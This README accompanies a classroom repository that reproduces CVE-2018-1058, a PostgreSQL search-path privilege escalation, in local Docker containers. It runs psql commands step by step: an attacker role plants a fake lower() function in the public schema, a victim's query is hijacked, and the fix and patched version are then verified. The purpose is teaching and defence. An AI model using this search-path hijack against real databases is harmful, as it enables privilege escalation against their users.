Share
## https://sploitus.com/exploit?id=F271E10E-74F6-5C2A-953B-E052B8E053FC
# CVE-2018-1058 โ€” PostgreSQL Search Path Demonstration

This repository contains the reproducibility artifacts for the report:

**CVE-2018-1058: Privilege Escalation in PostgreSQL through Uncontrolled Search Path**

The goal is to demonstrate the search-path trust failure behind CVE-2018-1058 using a safe local Docker environment.

The demo does **not** reproduce a destructive `pg_dump` exploit. Instead, it reproduces the same root cause described in PostgreSQL guidance: an attacker-writable schema contains a look-alike object, and another session resolves an unqualified name to that object.

---

## 1. Contents

```text
.
โ”œโ”€โ”€ report.pdf
โ”œโ”€โ”€ docker-compose.yml
โ”œโ”€โ”€ README.md
โ””โ”€โ”€ scripts/
    โ”œโ”€โ”€ init.sql
    โ”œโ”€โ”€ init_safe.sql
    โ”œโ”€โ”€ exploit.sql
    โ”œโ”€โ”€ victim_query.sql
    โ”œโ”€โ”€ verify_qualify.sql
    โ””โ”€โ”€ fix.sql
```

The final report is `report.pdf`.

No `Dockerfile` is required. The project uses official `postgres` images.

The screenshots are embedded directly in `report.pdf`, so they are not provided as separate image files.

## 2. Requirements

Install:

- Docker
- Docker Compose
- `psql` client, optional but recommended

The demo uses two PostgreSQL containers:

| Service | Version | Container name | Host port | Purpose |
| --- | --- | --- | --- | --- |
| `pg_vulnerable` | PostgreSQL 10.2 | `cve1058_pg_vulnerable` | `15432` | vulnerable demonstration |
| `pg_fixed` | PostgreSQL 10.3 | `cve1058_pg_fixed` | `15433` | patched/hardened comparison |

Make sure ports `15432` and `15433` are free.

## 3. Start the vulnerable environment

```bash
docker compose up -d pg_vulnerable
docker compose ps
```

Expected result: service `pg_vulnerable` should be running and mapped to port `15432`.

Check the PostgreSQL version:

```bash
docker exec -it cve1058_pg_vulnerable psql -U postgres -d demo_cve1058 -c "SELECT version();"
```

Expected result: PostgreSQL 10.2.

## 4. Inspect database roles

```bash
docker exec -it cve1058_pg_vulnerable psql -U postgres -d demo_cve1058 -c "\du"
```

Expected roles:

- `postgres`
- `attacker`
- `victim`

The attacker is not a PostgreSQL superuser.

## 5. Run the exploit

Run the attacker script:

```bash
PGPASSWORD='AttackerPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U attacker -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/exploit.sql
```

Expected output:

```text
CREATE TABLE
GRANT
GRANT
CREATE FUNCTION
```

This creates:

- a harmless `public.exploit_log` table;
- a fake `public.lower(varchar)` function.

## 6. Trigger the vulnerable behaviour as victim

```bash
PGPASSWORD='VictimPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U victim -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/victim_query.sql
```

Expected output:

```text
CVE-2018-1058 DEMO: Alice Demo
CVE-2018-1058 DEMO: Bob Demo
```

This shows that the victim's normal query resolved `lower(...)` to the attacker-controlled function.

## 7. Confirm the side effect

```bash
PGPASSWORD='AttackerPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U attacker -d demo_cve1058 \
-c "TABLE public.exploit_log;"
```

Expected result: rows showing that the fake function was executed.

## 8. Show defensive qualification

```bash
PGPASSWORD='VictimPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U victim -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/verify_qualify.sql
```

Expected output:

```text
alice demo
bob demo
```

This works because `pg_catalog.lower(...)` forces PostgreSQL to use the built-in function.

## 9. Apply the fix on the vulnerable container

```bash
PGPASSWORD='postgres' \
psql -h 127.0.0.1 -p 15432 -U postgres -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/fix.sql
```

Expected output may include:

```text
DROP FUNCTION
DROP TABLE
REVOKE
REVOKE
```

Then rerun the victim query:

```bash
PGPASSWORD='VictimPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U victim -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/victim_query.sql
```

Expected output:

```text
alice demo
bob demo
```

The attacker-controlled function is gone, and the query returns normal lowercase strings.

## 10. Start the hardened environment

```bash
docker compose up -d pg_fixed
docker compose ps
```

Check the version:

```bash
docker exec -it cve1058_pg_fixed psql -U postgres -d demo_cve1058 -c "SELECT version();"
```

Expected result: PostgreSQL 10.3.

## 11. Verify that the exploit fails on the hardened environment

```bash
PGPASSWORD='AttackerPw!ChangeMe' \
psql -h 127.0.0.1 -p 15433 -U attacker -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/exploit.sql
```

Expected output:

```text
ERROR: permission denied for schema public
```

This means the attacker cannot create the fake function in `public`, so the attack chain stops before name resolution.

## 12. Cleanup

To stop the containers:

```bash
docker compose down
```

To remove volumes and reset the project completely:

```bash
docker compose down -v
```

## 13. Notes

This demo is intentionally harmless. It does not steal data, access files, or execute operating-system commands.

The exploit uses a visible string prefix and a log table to prove that PostgreSQL resolved an unqualified function name to an attacker-controlled object.

The official CVE concerns `pg_dump` and other client applications. This repository demonstrates the same search-path trust failure in a safe and reproducible classroom setting.

## 14. References

- PostgreSQL CVE-2018-1058 advisory: 
- PostgreSQL Wiki, *A Guide to CVE-2018-1058*: 
- PostgreSQL 10.3 release notes: 
- NVD CVE-2018-1058: 
- MITRE CVE-2018-1058: